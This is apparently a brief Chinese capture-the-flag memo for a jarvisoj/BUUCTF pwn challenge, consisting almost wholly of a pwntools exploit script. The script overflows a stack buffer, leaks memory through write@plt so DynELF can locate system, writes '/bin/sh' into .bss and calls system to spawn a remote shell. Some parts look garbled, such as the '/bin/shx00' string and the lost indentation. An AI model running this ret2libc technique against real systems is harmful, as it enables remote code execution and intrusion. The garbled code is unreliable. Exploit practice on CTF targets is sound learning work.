![[DynELF]jarvisoj](http://www.mshxw.com/aiimages/31/283960.png "[DynELF]jarvisoj")
这题没给libc,所以用DynELF。
记录一下仅供自己使用,以免以后忘了他的用法。
from pwn import *
from LibcSearcher import *
r=remote('node4.buuoj.cn','26626')
#r=process('./a')
elf=ELF('./a')
context.log_level = 'debug'
#libc_base = ELF("./libc-2.23.so")
#context.terminal = ['tmux','splitw','-h']
write_plt=elf.plt['write']
read_plt=elf.plt['read']
main=0x08048350
bss_addr=0x0804A024
def leak(addr):
payload='a' * 0x88 + 'a' * 4 + p32(write_plt) + p32(main) + p32(1) + p32(addr) + p32(4)
r.sendline(payload)
leak_addr=r.recv(4)
return leak_addr
d=DynELF(leak,elf=elf)
sys_addr=d.lookup('system','libc')
payload1='a' * 0x88 + 'a' * 4 + p32(read_plt) + p32(main) + p32(0) + p32(bss_addr) + p32(9)
r.sendline(payload1)
r.sendline('/bin/shx00')
payload1='a' * 0x88 + 'a'*4+p32(sys_addr)+p32(0xaaaa)+p32(bss_addr)
r.sendline(payload1)
r.interactive()
